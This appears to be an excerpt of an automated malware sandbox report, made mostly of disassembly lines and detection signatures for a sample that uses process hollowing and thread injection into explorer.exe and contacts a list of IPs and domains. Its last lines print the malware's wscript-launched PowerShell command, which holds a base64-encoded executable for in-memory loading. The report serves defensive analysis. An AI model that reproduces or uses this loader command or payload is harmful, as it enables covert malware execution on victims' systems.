          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04574120 mov eax, dword ptr fs:[00000030h]7_2_04574120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04574120 mov ecx, dword ptr fs:[00000030h]7_2_04574120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0461FDE2 mov eax, dword ptr fs:[00000030h]7_2_0461FDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0461FDE2 mov eax, dword ptr fs:[00000030h]7_2_0461FDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0461FDE2 mov eax, dword ptr fs:[00000030h]7_2_0461FDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0461FDE2 mov eax, dword ptr fs:[00000030h]7_2_0461FDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04608DF1 mov eax, dword ptr fs:[00000030h]7_2_04608DF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6DC9 mov eax, dword ptr fs:[00000030h]7_2_045D6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6DC9 mov eax, dword ptr fs:[00000030h]7_2_045D6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6DC9 mov eax, dword ptr fs:[00000030h]7_2_045D6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6DC9 mov ecx, dword ptr fs:[00000030h]7_2_045D6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6DC9 mov eax, dword ptr fs:[00000030h]7_2_045D6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6DC9 mov eax, dword ptr fs:[00000030h]7_2_045D6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455B1E1 mov eax, dword ptr fs:[00000030h]7_2_0455B1E1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455B1E1 mov eax, dword ptr fs:[00000030h]7_2_0455B1E1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455B1E1 mov eax, dword ptr fs:[00000030h]7_2_0455B1E1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045E41E8 mov eax, dword ptr fs:[00000030h]7_2_045E41E8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456D5E0 mov eax, dword ptr fs:[00000030h]7_2_0456D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456D5E0 mov eax, dword ptr fs:[00000030h]7_2_0456D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458FD9B mov eax, dword ptr fs:[00000030h]7_2_0458FD9B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458FD9B mov eax, dword ptr fs:[00000030h]7_2_0458FD9B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04582990 mov eax, dword ptr fs:[00000030h]7_2_04582990
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_046205AC mov eax, dword ptr fs:[00000030h]7_2_046205AC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_046205AC mov eax, dword ptr fs:[00000030h]7_2_046205AC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457C182 mov eax, dword ptr fs:[00000030h]7_2_0457C182
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04582581 mov eax, dword ptr fs:[00000030h]7_2_04582581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04582581 mov eax, dword ptr fs:[00000030h]7_2_04582581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04582581 mov eax, dword ptr fs:[00000030h]7_2_04582581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04582581 mov eax, dword ptr fs:[00000030h]7_2_04582581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458A185 mov eax, dword ptr fs:[00000030h]7_2_0458A185
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04552D8A mov eax, dword ptr fs:[00000030h]7_2_04552D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04552D8A mov eax, dword ptr fs:[00000030h]7_2_04552D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04552D8A mov eax, dword ptr fs:[00000030h]7_2_04552D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04552D8A mov eax, dword ptr fs:[00000030h]7_2_04552D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04552D8A mov eax, dword ptr fs:[00000030h]7_2_04552D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D51BE mov eax, dword ptr fs:[00000030h]7_2_045D51BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D51BE mov eax, dword ptr fs:[00000030h]7_2_045D51BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D51BE mov eax, dword ptr fs:[00000030h]7_2_045D51BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D51BE mov eax, dword ptr fs:[00000030h]7_2_045D51BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04581DB5 mov eax, dword ptr fs:[00000030h]7_2_04581DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04581DB5 mov eax, dword ptr fs:[00000030h]7_2_04581DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04581DB5 mov eax, dword ptr fs:[00000030h]7_2_04581DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045861A0 mov eax, dword ptr fs:[00000030h]7_2_045861A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045861A0 mov eax, dword ptr fs:[00000030h]7_2_045861A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045835A1 mov eax, dword ptr fs:[00000030h]7_2_045835A1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D69A6 mov eax, dword ptr fs:[00000030h]7_2_045D69A6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0460B260 mov eax, dword ptr fs:[00000030h]7_2_0460B260
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0460B260 mov eax, dword ptr fs:[00000030h]7_2_0460B260
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04628A62 mov eax, dword ptr fs:[00000030h]7_2_04628A62
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045E4257 mov eax, dword ptr fs:[00000030h]7_2_045E4257
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04559240 mov eax, dword ptr fs:[00000030h]7_2_04559240
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04559240 mov eax, dword ptr fs:[00000030h]7_2_04559240
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04559240 mov eax, dword ptr fs:[00000030h]7_2_04559240
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04559240 mov eax, dword ptr fs:[00000030h]7_2_04559240
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04567E41 mov eax, dword ptr fs:[00000030h]7_2_04567E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04567E41 mov eax, dword ptr fs:[00000030h]7_2_04567E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04567E41 mov eax, dword ptr fs:[00000030h]7_2_04567E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04567E41 mov eax, dword ptr fs:[00000030h]7_2_04567E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04567E41 mov eax, dword ptr fs:[00000030h]7_2_04567E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04567E41 mov eax, dword ptr fs:[00000030h]7_2_04567E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0459927A mov eax, dword ptr fs:[00000030h]7_2_0459927A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457AE73 mov eax, dword ptr fs:[00000030h]7_2_0457AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457AE73 mov eax, dword ptr fs:[00000030h]7_2_0457AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457AE73 mov eax, dword ptr fs:[00000030h]7_2_0457AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457AE73 mov eax, dword ptr fs:[00000030h]7_2_0457AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457AE73 mov eax, dword ptr fs:[00000030h]7_2_0457AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0461EA55 mov eax, dword ptr fs:[00000030h]7_2_0461EA55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456766D mov eax, dword ptr fs:[00000030h]7_2_0456766D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455AA16 mov eax, dword ptr fs:[00000030h]7_2_0455AA16
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455AA16 mov eax, dword ptr fs:[00000030h]7_2_0455AA16
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458A61C mov eax, dword ptr fs:[00000030h]7_2_0458A61C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458A61C mov eax, dword ptr fs:[00000030h]7_2_0458A61C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04555210 mov eax, dword ptr fs:[00000030h]7_2_04555210
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04555210 mov ecx, dword ptr fs:[00000030h]7_2_04555210
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04555210 mov eax, dword ptr fs:[00000030h]7_2_04555210
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04555210 mov eax, dword ptr fs:[00000030h]7_2_04555210
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04573A1C mov eax, dword ptr fs:[00000030h]7_2_04573A1C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455C600 mov eax, dword ptr fs:[00000030h]7_2_0455C600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455C600 mov eax, dword ptr fs:[00000030h]7_2_0455C600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455C600 mov eax, dword ptr fs:[00000030h]7_2_0455C600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04588E00 mov eax, dword ptr fs:[00000030h]7_2_04588E00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04568A0A mov eax, dword ptr fs:[00000030h]7_2_04568A0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0460FE3F mov eax, dword ptr fs:[00000030h]7_2_0460FE3F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611608 mov eax, dword ptr fs:[00000030h]7_2_04611608
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455E620 mov eax, dword ptr fs:[00000030h]7_2_0455E620
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04594A2C mov eax, dword ptr fs:[00000030h]7_2_04594A2C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04594A2C mov eax, dword ptr fs:[00000030h]7_2_04594A2C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04582ACB mov eax, dword ptr fs:[00000030h]7_2_04582ACB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045836CC mov eax, dword ptr fs:[00000030h]7_2_045836CC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04598EC7 mov eax, dword ptr fs:[00000030h]7_2_04598EC7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0460FEC0 mov eax, dword ptr fs:[00000030h]7_2_0460FEC0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04628ED6 mov eax, dword ptr fs:[00000030h]7_2_04628ED6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045676E2 mov eax, dword ptr fs:[00000030h]7_2_045676E2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045816E0 mov ecx, dword ptr fs:[00000030h]7_2_045816E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04582AE4 mov eax, dword ptr fs:[00000030h]7_2_04582AE4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04620EA5 mov eax, dword ptr fs:[00000030h]7_2_04620EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04620EA5 mov eax, dword ptr fs:[00000030h]7_2_04620EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04620EA5 mov eax, dword ptr fs:[00000030h]7_2_04620EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458D294 mov eax, dword ptr fs:[00000030h]7_2_0458D294
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458D294 mov eax, dword ptr fs:[00000030h]7_2_0458D294
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045EFE87 mov eax, dword ptr fs:[00000030h]7_2_045EFE87
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456AAB0 mov eax, dword ptr fs:[00000030h]7_2_0456AAB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456AAB0 mov eax, dword ptr fs:[00000030h]7_2_0456AAB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458FAB0 mov eax, dword ptr fs:[00000030h]7_2_0458FAB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045552A5 mov eax, dword ptr fs:[00000030h]7_2_045552A5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045552A5 mov eax, dword ptr fs:[00000030h]7_2_045552A5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045552A5 mov eax, dword ptr fs:[00000030h]7_2_045552A5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045552A5 mov eax, dword ptr fs:[00000030h]7_2_045552A5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045552A5 mov eax, dword ptr fs:[00000030h]7_2_045552A5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D46A7 mov eax, dword ptr fs:[00000030h]7_2_045D46A7
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040ACE0 LdrLoadDll,3_2_0040ACE0

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.91 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 76.223.105.230 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 99.83.196.71 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.baroevent.com
          Source: C:\Windows\explorer.exeDomain query: www.apinspect.net
          Source: C:\Windows\explorer.exeNetwork Connect: 150.95.255.38 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 209.142.66.216 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.electorhome.com
          Source: C:\Windows\explorer.exeDomain query: www.krmq9w.cfd
          Source: C:\Windows\explorer.exeDomain query: www.qsmdrkjw.cfd
          Source: C:\Windows\explorer.exeDomain query: www.rixiojjl.cfd
          Source: C:\Windows\explorer.exeDomain query: www.lajzznhk.cfd
          Source: C:\Windows\explorer.exeDomain query: www.hyperpigmentation-91528.bond
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\svchost.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: DD0000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 401000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EA9008Jump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\svchost.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" [byte[]] $rowg = [system.convert]::frombase64string('tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaa4fug4atannibgbtm0hvghpcybwcm9ncmftignhbm5vdcbizsbydw4gaw4gre9tig1vzguudq0kjaaaaaaaaabqrqaataedajmmmgqaaaaaaaaaaoaaaielavaaaeyaaaagaaaaaaaagmqaaaagaaaagaaaaaaaeaagaaaaagaabaaaaaaaaaagaaaaaaaaaadaaaaaagaaaaaaaamayiuaabaaabaaaaaaeaaaeaaaaaaaabaaaaaaaaaaaaaaamvjaabpaaaaaiaaacgdaaaaaaaaaaaaaaaaaaaaaaaaakaaaawaaadeygaahaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaiaaacaaaaaaaaaaaaaaaccaaaegaaaaaaaaaaaaaac50zxh0aaaaieqaaaagaaaargaaaaiaaaaaaaaaaaaaaaaaacaaagaucnnyywaaacgdaaaagaaaaaqaaabiaaaaaaaaaaaaaaaaaabaaabalnjlbg9jaaamaaaaakaaaaacaaaataaaaaaaaaaaaaaaaaaaqaaaqgaaaaaaaaaaaaaaaaaaaad5ywaaaaaaaegaaaacaauaudeaaaqvaaadaaaaaaaaalxgaaaiagaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaboosqaabioeaigbaaakkh4ckaqaaaoqabmwcabjaaaaaaaaahmfaaakgaeaaaqwkwewrqmaaaacaaaadwaaabwaaaarj3mgaaakgaiaaaqxk+bzbwaacoadaaaegcvtcwgaaaqabaaabbkrxioufgeaaarvcqaacioufgiaaarvcgaacioufgmaaarvcwaacioufgqaaarvdaaacir2fysbfiwafguaaaqukbsaaaosjhibaabwhchkaaag0auaaaioeaaacm8caaakcx0aaaqabqaabh4faaaekhp+bgaabcoeaoagaaaeklzzdqaabigeaaakdayaaakabwaabcoeaigfaaakkhp+bwaabcoaka4aaayqhgioewaacioaabswdwdnbgaaaqaaesaadaaakcaaaaowkwewrqwaaaafaaaavweaagqbaaazagaaaqiaahocaaclagaa0wiaapgcaaavawaaaqmaaludaaa4dqyaahmhaaakjsgiaaakbymaaaockcqaaapyiqaacbyosgaabnitaabwfyhkaaagbyuaaapymqaacbgosgaabni/aabwhchkaaagbyuaaapyqwaacbwosgaabnjpaabwhihkaaagbyuaaapyuwaacbgosgaabnjfaabwhshkaaagbyuaaapyywaacbgosgaabnj1aabwhshkaaagbyuaaapyeqaacbwosgaabnklaabwfyhkaaagbyuaaapyjwaacb4osgaabnkhaabwhihkaaagbyuaaapypqaacbwosgaabnkxaabwgchkaaagbyuaaapytqaacbsosgaabnlhaabwgyhkaaagbyuaaapyywaacbwosgaabnldaabwgshkaaagbyuaaapy4qaacb0osgaabnlzaabwgihkaaagbyuaaapvjgaacgogbycaaaolfzh0/v//bygkaaakcxg4z/7//wny9waacboosgaabhyokaaacjoeaqaahxookqaacivy+waacboosgaabigqaaakewqsbp4wfqaaaw8raaakcv8aahadkeoaaayokwaacgxycqeacb0osgaabigsaaakkaeaacstthmuaaakcy8aaaotbreff28waaakeqvyfqeacbkosgaabm8xaaakeqvyiqeacboosgaabggomgaacm8zaaakjrefbzqaaapvnqaaciz+ngaacnl7aqbwhchkaaagf283aaakdrk4mp3//wlvoaaacnjxagbwhchkaaagkaiaacsteglyyqiacb0osgaabghvogaacglvowaacho4yv3//wcopaaacigwaaaggzhr/f//oageaaaecmscahadkeoaaaywkcgaaao65gmaab8akckaaaotbhw4jv3//xegcz0aaapycqeacb0osgaabm8+aaakkamaacs6ogmaacgqaaakewqdopj8//8sbp4wfqaaaw8raaakcm8cahaakeoaaayomgaachmhhjjt/p//eqzyeqiacbwosgaabhehkd8aaaotcb8jolb8//9zlgaacnmvaaakewkrcrdvmaaachejcn0cahaekeoaaazvmqaachejcvecahaxkeoaaayrccgyaaakbzmaaaoleqlvnaaacm81aaakjh8kogl8//8uewpyywmacbyosgaabnj/awbwkeaaaaoodqaachmk3holkeeaaaotcxyrarysaisikeiaaaoxk/teabekob0caaauewwfczgw/p//eqoucoedahaekeoaaayxjqyaaaelfnkfawbwgihkaaagohqufchdaaakkeqaaapyrwmacbyosgaabheikeuaaaookgaacowvaaabkeyaaaotdrenkecaaaotdheokegaaao6haiaabekfhllawbwhchkaaagf40gaaabjryrdqilew8ufbencaaaasuwf5wlexaoqwaacheqfpeshxepfpoodqaactadaaabkbaaaaoosqaacnqdaaabew4odqaachmmfisbfkugaaaabqaaadeaaacca
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" [byte[]] $rowg = [system.convert]::frombase64string('tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaa4fug4atannibgbtm0hvghpcybwcm9ncmftignhbm5vdcbizsbydw4gaw4gre9tig1vzguudq0kjaaaaaaaaabqrqaataedajmmmgqaaaaaaaaaaoaaaielavaaaeyaaaagaaaaaaaagmqaaaagaaaagaaaaaaaeaagaaaaagaabaaaaaaaaaagaaaaaaaaaadaaaaaagaaaaaaaamayiuaabaaabaaaaaaeaaaeaaaaaaaabaaaaaaaaaaaaaaamvjaabpaaaaaiaaacgdaaaaaaaaaaaaaaaaaaaaaaaaakaaaawaaadeygaahaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaiaaacaaaaaaaaaaaaaaaccaaaegaaaaaaaaaaaaaac50zxh0aaaaieqaaaagaaaargaaaaiaaaaaaaaaaaaaaaaaacaaagaucnnyywaaacgdaaaagaaaaaqaaabiaaaaaaaaaaaaaaaaaabaaabalnjlbg9jaaamaaaaakaaaaacaaaataaaaaaaaaaaaaaaaaaaqaaaqgaaaaaaaaaaaaaaaaaaaad5ywaaaaaaaegaaaacaauaudeaaaqvaaadaaaaaaaaalxgaaaiagaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaboosqaabioeaigbaaakkh4ckaqaaaoqabmwcabjaaaaaaaaahmfaaakgaeaaaqwkwewrqmaaaacaaaadwaaabwaaaarj3mgaaakgaiaaaqxk+bzbwaacoadaaaegcvtcwgaaaqabaaabbkrxioufgeaaarvcqaacioufgiaaarvcgaacioufgmaaarvcwaacioufgqaaarvdaaacir2fysbfiwafguaaaqukbsaaaosjhibaabwhchkaaag0auaaaioeaaacm8caaakcx0aaaqabqaabh4faaaekhp+bgaabcoeaoagaaaeklzzdqaabigeaaakdayaaakabwaabcoeaigfaaakkhp+bwaabcoaka4aaayqhgioewaacioaabswdwdnbgaaaqaaesaadaaakcaaaaowkwewrqwaaaafaaaavweaagqbaaazagaaaqiaahocaaclagaa0wiaapgcaaavawaaaqmaaludaaa4dqyaahmhaaakjsgiaaakbymaaaockcqaaapyiqaacbyosgaabnitaabwfyhkaaagbyuaaapymqaacbgosgaabni/aabwhchkaaagbyuaaapyqwaacbwosgaabnjpaabwhihkaaagbyuaaapyuwaacbgosgaabnjfaabwhshkaaagbyuaaapyywaacbgosgaabnj1aabwhshkaaagbyuaaapyeqaacbwosgaabnklaabwfyhkaaagbyuaaapyjwaacb4osgaabnkhaabwhihkaaagbyuaaapypqaacbwosgaabnkxaabwgchkaaagbyuaaapytqaacbsosgaabnlhaabwgyhkaaagbyuaaapyywaacbwosgaabnldaabwgshkaaagbyuaaapy4qaacb0osgaabnlzaabwgihkaaagbyuaaapvjgaacgogbycaaaolfzh0/v//bygkaaakcxg4z/7//wny9waacboosgaabhyokaaacjoeaqaahxookqaacivy+waacboosgaabigqaaakewqsbp4wfqaaaw8raaakcv8aahadkeoaaayokwaacgxycqeacb0osgaabigsaaakkaeaacstthmuaaakcy8aaaotbreff28waaakeqvyfqeacbkosgaabm8xaaakeqvyiqeacboosgaabggomgaacm8zaaakjrefbzqaaapvnqaaciz+ngaacnl7aqbwhchkaaagf283aaakdrk4mp3//wlvoaaacnjxagbwhchkaaagkaiaacsteglyyqiacb0osgaabghvogaacglvowaacho4yv3//wcopaaacigwaaaggzhr/f//oageaaaecmscahadkeoaaaywkcgaaao65gmaab8akckaaaotbhw4jv3//xegcz0aaapycqeacb0osgaabm8+aaakkamaacs6ogmaacgqaaakewqdopj8//8sbp4wfqaaaw8raaakcm8cahaakeoaaayomgaachmhhjjt/p//eqzyeqiacbwosgaabhehkd8aaaotcb8jolb8//9zlgaacnmvaaakewkrcrdvmaaachejcn0cahaekeoaaazvmqaachejcvecahaxkeoaaayrccgyaaakbzmaaaoleqlvnaaacm81aaakjh8kogl8//8uewpyywmacbyosgaabnj/awbwkeaaaaoodqaachmk3holkeeaaaotcxyrarysaisikeiaaaoxk/teabekob0caaauewwfczgw/p//eqoucoedahaekeoaaayxjqyaaaelfnkfawbwgihkaaagohqufchdaaakkeqaaapyrwmacbyosgaabheikeuaaaookgaacowvaaabkeyaaaotdrenkecaaaotdheokegaaao6haiaabekfhllawbwhchkaaagf40gaaabjryrdqilew8ufbencaaaasuwf5wlexaoqwaacheqfpeshxepfpoodqaactadaaabkbaaaaoosqaacnqdaaabew4odqaachmmfisbfkugaaaabqaaadeaaaccaJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJmMmGQAAAAAAAAAAOAAAiELAVAAAEYAAAAGAAAAAAAAGmQAAAAgAAAAgAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAADAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAMVjAABPAAAAAIAAACgDAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAADEYgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAIEQAAAAgAAAARgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACgDAAAAgAAAAAQAAABIAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKAAAAACAAAATAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAD5YwAAAAAAAEgAAAACAAUAuDEAAAQvAAADAAAAAAAAALxgAAAIAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABooSQAABioeAigBAAAKKh4CKAQAAAoqABMwCABJAAAAAAAAAHMFAAAKgAEAAAQWKwEWRQMAAAA